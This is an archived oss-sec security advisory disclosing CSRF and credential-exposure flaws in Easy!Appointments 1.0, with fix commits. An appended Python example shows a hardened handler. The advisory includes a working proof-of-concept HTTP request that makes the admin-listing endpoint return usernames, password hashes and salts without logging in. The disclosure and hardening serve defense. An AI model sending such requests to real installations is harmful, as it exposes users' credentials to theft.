oss-sec mailing list archives
CVE request: Easy!Appointments 1.0 Cross-Site Request Forgery and Insufficiently Protected Credentials vulnerabilities
From: Henri Salo <henri () nerv fi>
Date: Mon, 27 Jul 2015 16:14:21 +0300
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Product: Easy!Appointments Open Source Appointment Scheduler
Product URL: http://easyappointments.org/
Vendor: Alex Tselegidis
Vulnerability Type: Cross-Site Request Forgery (CWE-352)
                    Insufficiently Protected Credentials (CWE-522)
Vulnerable Versions: 1.0
Fixed Version: next release
Vendor Notification: 2015-04-03
Solution Status: Fixed by vendor
Solution Date: 2015-05-28
Public Disclosure: 2015-07-27

Vulnerability Details:

The web application does not sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. The application transmits all user credentials to an unauthenticated user and possibly allows other unauthorized actions.

Proof-of-concept without authentication:

"""
POST /ea/backend_api/ajax_filter_admins HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://example.com/ea/backend/users
Content-Length: 4
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

key=
"""

Returns:

"""
HTTP/1.1 200 OK
Date: Thu, 09 Apr 2015 10:28:38 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.4.39-0+deb7u2
Set-Cookie: ci_session=*removed*; expires=Thu, 09-Apr-2015 12:28:38 GMT; path=/
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 539

[{"id":"84","first_name":"Henri","last_name":"Salo","email":"email () example com","mobile_number":null,"phone_number":"04012345678","address":null,"city":null,"state":null,"zip_code":null,"notes":null,"id_roles":"1","settings":{"username":"henri","password":"1f40f9a5d17bedf197274fcc1886ef6ef4015b0f883513782d6fa437f8ab9af7","salt":"547ca602bda6a2a97ff4222fb71d61c75436da1ebf86a41c33219d11f1f4568e","working_plan":null,"notifications":"0","google_sync":"0","google_token":null,"google_calendar":null,"sync_past_days":"5","sync_future_days":"5"}}]
"""

Fixed in the following commit:
https://github.com/alextselegidis/easyappointments/commit/1f73e7fcbc2c06505178200567ac905ae8570326

Related commits to add CSRF protection:
https://github.com/alextselegidis/easyappointments/commit/f223ffa343ad91d046b4469248f6479edf1718d7
https://github.com/alextselegidis/easyappointments/commit/daf4865c290c58b66f73507a0ae1ec41987ad840
https://github.com/alextselegidis/easyappointments/commit/d88c138d2dd35820e355f0d7f3b93db3cc5473e8
https://github.com/alextselegidis/easyappointments/commit/ad8c9b6522c560ac5b6309f62f8b3e2319483d54
https://github.com/alextselegidis/easyappointments/commit/ecbe5600df03ac970e4e743215d3b3be6e1e6860

References:
https://scapsync.com/cwe/CWE-352
https://scapsync.com/cwe/CWE-522
https://cwe.mitre.org/data/definitions/352.html
https://cwe.mitre.org/data/definitions/522.html
https://en.wikipedia.org/wiki/Cross-site_request_forgery
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet

- --
Henri Salo

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBAgAGBQJVti6tAAoJECet96ROqnV0mlwP/R82KPUH15elyTfqeImCsc/6
FpUiZrvQPvW2saPlweec6vLsdr361dZb3wfSLpltyDK/b/XFhRxGOqufjETDfsrr
tP5y7OqvpzKisu+itOpsFBiFppuLD3UCK2GsWyFM0JHrcSkOyG5dKQ1LGkQzZObD
vG2U6ofB7PRoW0C9iorlUVa7InUt9sEWojwjsONtacbibiLD4jIqui1YUs0Dg9yj
QUTBKd8RcSUddkZYzhKIkhBYgdaMdSO1ObE1taLZlK2lfQCI9L5pAXAf4k8YRP5X
N+wiX6LfmVcb+8Os0iJpsFZLT9oe0B3Kl1elm51MWFyA00P5M7B8x3svkeH34LUH
OBDyE92+LH352zn9nDIpZFeEwoEZTEZak5zAKM0L1i+qXU9LRwwZXahFvY4VyZng
mvqf4tZEogJV55q27HaWr1595b7MEHBexiNQmFrC5k9l2fFzVZRnlaIHLYjGvwpf
vSFHG8u/YpSmOOM3FM/yRZlgR21jM2cdYIDs5vpQkGfjdSW61CdQwp6m/j1znkqH
jjxYiqIhp9me4xEWmAhgm26HkQcpCHlEBwA2N2x9RvnS/Lw6oPHln8dxhu4OP3mr
Eq43X2Zz8kQJkZuQnufAzmtMYxvKmzhfVYWREBzhohox+nXImqlAvYxzCQzBEGBE
++lf9BJDbx+CMendxx9Z
=cYYp
-----END PGP SIGNATURE-----
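The advisory above describes two defects in one endpoint: it answers anonymous callers (and, per the CWE-352 finding, requests that carry no anti-forgery token), and its JSON response includes each admin's password hash and salt. The following is an added example, written for this archive page and not code from Easy!Appointments or its author, of what a hardened version of such an `ajax_filter_admins` handler looks like in Python. It assumes a server-side session dict with `user_id`, `role_id` and `csrf_token` keys, a submitted form dict, and that role id "1" is the administrator role (taken from the `id_roles` value in the sample record); the record data is constructed to match the shape of the response in the proof-of-concept, with placeholder values.

```python
import hmac
import json
import secrets

# Constructed sample data in the shape of the record returned in the
# advisory's proof-of-concept; every value here is a placeholder.
ADMIN_RECORDS = [
    {
        "id": "84",
        "first_name": "Henri",
        "last_name": "Salo",
        "email": "admin@example.com",
        "id_roles": "1",
        "settings": {
            "username": "henri",
            "password": "<placeholder password hash>",
            "salt": "<placeholder salt>",
            "google_token": None,
            "notifications": "0",
            "google_sync": "0",
        },
    }
]

ADMIN_ROLE_ID = "1"  # assumption: id_roles "1" is the admin role, as in the sample
# Settings keys that must never be serialised into an API response (CWE-522).
# google_token is included as a design choice: it is an OAuth credential.
SENSITIVE_SETTINGS = frozenset({"password", "salt", "google_token"})


def new_session(user_id, role_id):
    """Server-side session for a logged-in user, carrying a per-session
    synchroniser token that every form must echo back (CWE-352 mitigation)."""
    return {"user_id": user_id, "role_id": role_id,
            "csrf_token": secrets.token_hex(32)}


def sanitize_record(record):
    """Return a copy of an admin record with credential material stripped;
    the stored record itself is left untouched."""
    clean = {k: v for k, v in record.items() if k != "settings"}
    clean["settings"] = {k: v for k, v in record.get("settings", {}).items()
                         if k not in SENSITIVE_SETTINGS}
    return clean


def csrf_token_valid(session, form):
    """Constant-time comparison of the session token with the submitted one."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not isinstance(expected, str) or not isinstance(supplied, str):
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode())


def ajax_filter_admins(session, form, records=ADMIN_RECORDS):
    """Hardened handler. Returns (http_status, payload); the payload is a
    plain Python object so it can be inspected before JSON encoding."""
    # 1. Authentication and authorisation: the vulnerable endpoint had neither.
    if not session or "user_id" not in session:
        return 401, {"error": "login required"}
    if session.get("role_id") != ADMIN_ROLE_ID:
        return 403, {"error": "admin privileges required"}
    # 2. Anti-forgery: reject requests that do not carry the session's token.
    if not csrf_token_valid(session, form):
        return 403, {"error": "missing or invalid CSRF token"}
    # 3. The actual work: case-insensitive substring match on name and email.
    key = str(form.get("key", "")).lower()
    matched = [r for r in records
               if key in " ".join((r["first_name"], r["last_name"], r["email"])).lower()]
    # 4. Strip credentials from every record before it leaves the server.
    return 200, [sanitize_record(r) for r in matched]


def render(status, payload):
    """Encode a handler result the way the AJAX caller expects (JSON body)."""
    return status, json.dumps(payload)


if __name__ == "__main__":
    session = new_session("84", ADMIN_ROLE_ID)
    # Anonymous request, as in the proof-of-concept: no data, only a 401.
    print(render(*ajax_filter_admins({}, {"key": ""})))
    # Logged-in admin with a valid token: records without password or salt.
    print(render(*ajax_filter_admins(
        session, {"key": "", "csrf_token": session["csrf_token"]})))
```

The order of the checks matters: authentication is decided before the CSRF token is looked at, so an anonymous request is refused without leaking whether a token was expected, and the credential stripping happens on a copy so the stored record keeps its hash and salt for login verification while the API never sees them.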